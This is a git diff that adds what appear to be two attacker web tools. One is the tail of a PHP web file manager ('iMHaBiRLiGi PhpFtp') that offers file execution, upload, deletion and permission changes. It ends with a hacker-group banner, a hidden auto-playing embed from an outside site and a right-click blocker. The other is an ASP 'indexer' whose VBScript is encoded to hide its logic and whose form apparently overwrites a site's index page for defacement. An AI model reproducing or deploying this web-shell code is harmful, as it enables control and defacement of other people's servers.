+'Sild' => "Ces fichiers ont été détuits:\n[%1]",
+'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
+'Degistir_file' => 'Renomme fichier:',
+'Degistird' => '"[%1]" a été renommé en "[%2]".',
+'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
+'Tasi_files' => 'Déplacer ces fichiers:',
+'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
+'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
+'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
+'saved' => '"[%1]" a été sauvegardé.',
+'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
+'not_readable' => '"[%1]" ne peut pas être ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'Görevler' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'Sil' => 'cancella',
+'Degistir' => 'rinomina',
+'Tasi' => 'sposta',
+'Kopyala' => 'copia',
+'Düzenle' => 'modifica',
+'indir' => 'indir',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'Geri' => 'indietro',
+'Yol' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" è stato caricato.',
+'not_uploaded' => '"[%1]" non è stato caricato.',
+'already_exists' => '"[%1]" esiste già.',
+'created' => '"[%1]" è stato creato.',
+'not_created' => '"[%1]" non è stato creato.',
+'really_Sil' => 'Cancello questi file ?',
+'Sild' => "Questi file sono stati cancellati:\n[%1]",
+'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
+'Degistir_file' => 'File rinominato:',
+'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
+'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
+'Tasi_files' => 'Sposto questi file:',
+'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" non può essere modificato.',
+'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" è stato salvato.',
+'not_saved' => '"[%1]" non è stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non può essere letto.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'Säkerhetsnivå',
+'owner' => 'Ägare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'Görevler' => 'Funktioner',
+ 
+'read' => 'Läs',
+'write' => 'Skriv',
+'execute' => 'Utför',
+ 
+'create_symlink' => 'Skapa symlink',
+'Sil' => 'Radera',
+'Degistir' => 'Byt namn',
+'Tasi' => 'Flytta',
+'Kopyala' => 'Kopiera',
+'Düzenle' => 'Ändra',
+'indir' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => 'Ändra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'Töm',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'Geri' => 'Tillbaks',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Användare',
+'password' => 'Lösenord',
+'add' => 'Lägg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_Sil' => 'Radera dessa filer?',
+'Sild' => "De här filerna har raderats:\n[%1]",
+'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
+'Degistir_file' => 'Byt namn på fil:',
+'Degistird' => '"[%1]" har bytt namn till "[%2]".',
+'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
+'Tasi_files' => 'Flytta dessa filer:',
+'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" kan inte ändras.',
+'executed' => "\"[%1]\" har utförts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'Rättigheter för "[%1]":',
+'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte läsas.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Düzergah',
+'file' => 'Dosya',
+'filename' => 'DosyaAdi',
+
+'size' => 'Boyut',
+'permission' => 'izin',
+'owner' => 'Sahip',
+'group' => 'Grup',
+'other' => 'Diğerleri',
+'Görevler' => 'Görevler',
+
+'read' => 'Oku',
+'write' => 'Yaz',
+'execute' => 'Uygula',
+
+'create_symlink' => 'create symlink',
+'Sil' => 'Sil',
+'Degistir' => 'Degistir',
+'Tasi' => 'Tasi',
+'Kopyala' => 'Kopyala',
+'Düzenle' => 'Düzenle',
+'indir' => 'indir',
+'upload' => 'Yükle',
+'create' => 'Olustur',
+'change' => 'Degisiklik',
+'save' => 'Kaydet',
+'set' => 'Koyulan',
+'reset' => 'Yenile',
+'relative' => 'Hedefe Yolla',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'Geri' => 'Geri',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'Hiçbir çıktı',
+
+'user' => 'Kullanıcı',
+'password' => 'Sifre',
+'add' => 'Ekle',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" Yüklendi.',
+'not_uploaded' => '"[%1]" Yüklenemedi.',
+'already_exists' => '"[%1]" Şimdiden var ol.',
+'created' => '"[%1]" Olusturuldu.',
+'not_created' => '"[%1]" Olusturuldu.',
+'really_Sil' => 'Silinen dosyalar?',
+'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
+'not_Sild' => "Bu dosyalar olamazdı Sild:\n[%1]",
+'Degistir_file' => 'Dosyayi Degistir:',
+'Degistird' => '"[%1]" Degistirildi "[%2]".',
+'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
+'Tasi_files' => 'Dosyayi TAsi:',
+'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]",
+'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Bu Dosyalari Kopyala:',
+'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
+'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" Düzenle.',
+'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
+'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
+'saved' => '"[%1]" Kurtarildi.',
+'not_saved' => '"[%1]" Kurtarılamadı.',
+'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
+'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
+'permission_for' => 'izin "[%1]":',
+'permission_set' => 'izin "[%1]" Kopyalandi [%2].',
+'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].',
+'not_readable' => '"[%1]" Okunamadi.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$charset" />
+
+<title>iMHaBiRLiGi PhpFtp</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 0px; height: 0px }
+a, a:visited { text-decoration: none; color: red }
+hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; Geriground: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .Görevler { text-align: left }
+.listing_footer td { Geriground: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { Geriground: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; Geriground: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { Geriground: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { Geriground: maroon; color: white; border: 1px solid silver }
+#notice td { Geriground: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+?>
+<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100 
+src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
+<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
+<FONT 
+class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true 
+type="text/plain; charset=iso-8859-9" 
+AUTOSTART="TRUE">
+<script language=JavaScript>
+<!--
+
+var message="";
+///////////////////////////////////
+function clickIE() {if (document.all) {(message);return false;}}
+function clickNS(e) {if 
+(document.layers||(document.getElementById&&!document.all)) {
+if (e.which==2||e.which==3) {(message);return false;}}}
+if (document.layers) 
+{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
+else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
+
+document.oncontextmenu=new Function("return false")
+// --> 
+</script>
\ No newline at end of file
diff --git a/php/indexer.asp.php.txt b/php/indexer.asp.php.txt
new file mode 100644
index 0000000..aefbc3e
--- /dev/null
+++ b/php/indexer.asp.php.txt
@@ -0,0 +1,74 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
+<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+	YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0Vıx9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;şY!Dhl,CCV0ıP..k^:kş,#nXmP`x;Y;ssEş~?.\DsCMlPİU[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslMıUPbç+.rğbxk~G0Ehl0~bçkU,XmyıVsışYıM @!(D@*@!^k@*$!P?1.kaYV~$kMPÇK3~?rOXnP`ğ.lşsl[C	P}C4s+O/b"1+~İ	N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDrçP*@!Vb@*j^MkwOr	PFE^smxısışı,İV0PAm3ışDCPnl.ışı3,Mnsm+0OkMR@!^r@*SüD0x~ArsTk~29rxs+V~İçbxPF;^VCxsC,|ısm\!yE	E,63!X;x!y  c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC	k:xE@!mnxDnM@*@!6W	YP1W^GD{Vr:Pdr.+'l@*|!VVmUıhP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^mğıxıy~r	Nn6b~Tk.bx,`bDl1Cğıxı.Prx9+a~n+x9rPUkYUry9+,rs:Csı*ÖDU)Gn0mEsOcl/2@!^k@*1.XnQP~EPnı/sCPİ	Nn6bPuC	ok,jkD+X~)Ymmm3dlUı",WUE	~XDrUbPXC"mmC3kıUı.Pö.	P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,ÖIg3|,"Z@!Jl@*@!J0W	O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nnğr	k"PGGkXC	ıx,bNı	ıPjnPI+.k	k~emyıx,@!l,tDWxgKD	+V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzPÖ"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk	NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0kşVE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03ı@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6ıx[C	P5m"ıVsışYıDc@!sk@*fğ+.Vr~:lVı:,)D0l[Cş^lDıh~_WsXGnsWUvb9:k	#,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n	l~b9hbxr*PBPfVbWkş3~`UlUC^bDUl,bNsrUk*PBPPE.C	/G0D~`:E.C	/WWOcKVPz[skUb#,~Pg+K~.PPü:,b[CsPr^Cx^lDm~P+ş30üDs+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmXıY*~@!J0W	O@*K!Ysl"R@!sb@*3L9nDbx~ezwYığı~$!xCP~n	ynMPUmDbwD~KüsP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCVısNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:üh~Aİ^obVnDr~dWLV!zWMVC.*@!Vr@*Vü\nx^r,ArMPUmDbwD~İçk	Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl	ı"ıPÖ	+.rMky E@#@&sk	V^+.{J@!m+	Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~UİK2d3Iİ@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk	L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC	k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+	@#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
+<center>
+<br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><br><br>
+<hr color=lime width=50%>
+<SCRIPT LANGUAGE="JavaScript">
+ <!-- 
+function Start(page)
+ {
+ OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
+ }
+ //-->
+</SCRIPT>
+<script language="JavaScript1.2">
+var message="SaNaLTeRoR - İnDexEr - Reader"
+var typingbasecolor="red"
+var typingtextcolor="lime"
+var blinkspeed=598 
+var fontface="arial,geneva,helvetica"
+var fontsize="5"
+var n=0
+if (document.all){
+document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
+for (m=0;m<message.length;m++)
+document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
+document.write('</font>')
+var tempref=document.all.typinglight
+}
+else
+document.write(message)
+function typing(){
+if (n==0){
+for (m=0;m<message.length;m++)
+tempref[m].style.color=typingbasecolor
+}
+tempref[n].style.color=typingtextcolor
+if (n<tempref.length-1)
+n++
+else{
+n=0
+clearInterval(blinking)
+setTimeout("starttyping()",1500)
+return
+}
+}
+function starttyping(){
+if (document.all)
+blinking=setInterval("typing()",blinkspeed)
+}
+starttyping()
+</script> 
+<form action="?Gonder" method="post">
+<center><table>
+<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
+<td><input type="submit" onclick="submit()" value="Veriyi Gönder"></td><tr>
+<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value="    Temizle    "></td><tr>
+</form>
+<form action="?oku" method="post">
+<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value="  Veriyi Oku   "></td><tr>
+</form>
+</table><br>
+<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
+Script Hakkında </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullanım Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
+<br><br><br>
+<hr color=lime width=50%>
+<%#@~^VA4AAA==n	N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~	+aY@#@&	+.9+	P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n	P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n	YnD@*E@#@&n^/@#@&M+k2W	/nRSDrOPJİş^n:bxk.~$lşmDı^ıJ@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP	nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+	NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P	WDPnD.~{PTPD4+	P@#@&M+/2G	/nRS.bYn,J@!m+	Y.@*_bPb,)~EL+DM N/mMr2YbW	[E@!^n	YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+	PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]İSAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W	/n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n	NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW	dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW	/nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG	/RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW	/nRA.bYnPrE[DEd'rJ@#@&n	N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G	/nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW	/ hMkO+,JE'DE/LEJ@#@&+	[~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*İV0~ÖUmPnE.4CUı	PjkDn/bxn~zY:CV,kçrx,8bD~bx9+6,tm"ıD^lzıxc@!sr@*?Yc~k	N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC	ıxCPIüV^+zbxc@!Vb@*UGxMl~k	Nna,Alkısl1l3,drYX^+~lzUı,/nD7nD9lU~kkYn~mVıUPJ~wDnVDPbçk	~h4dls4C~bN+ms@!^k@*Grz+^ksP)NChı	PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l	P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9ığıxı"ı~7lDkCXmVı:@!sr@*UY,kUNnaD~l	[PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k	N6nD Ckw~ob8k,XüVsNkUr.R@!Vb@*_l"ıMVmNığıxı.PbUN6rNPCz	ıPX.+,lYDıUı"R@!Vb@*Şr:[r,MnV9rPnE.8mxl~r	Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk	NnP@!WKxOP1GVKDx2bx3@*HD[+	@!J0G	Y@*PXmymUPH+.+,lOC1lğı:ı.~k	N+Xrhk.k	PCNıUı~Hl"ıXK.E.Rcr	N+a 4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|ıdhı	l~İ/~b9lhıU,+8~nlslkö.ü,4r.NxP(k.r:,3slköD[n	P4b~l^YP9r"k	NPGV[;ğ!Prçk	~RczhC4:EO&bx[+X 4Yh,XmyıXKD!"P(E.Nm3r~bxNaR4Y:,C[lsıx,/rYndbx[+0rPbx[nXB+~LöM+~NğrşbD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,MöU[DPP;ş!xCP~CkYığıhı.NmPb9ls~İx9+ak,XnhbşPr^;XKDR@!sr@*~E,kşs+h[P@!0KUY,mGsKD'2r	3@*r0;@!zWKxD@*P0ı/sı~AKşPFl^l^C0R@!^r@*zDYı0~ul^l,bUVChmNız/mUıy,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk	P&PsW[smDıx9Cx,XlM[ıhPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n	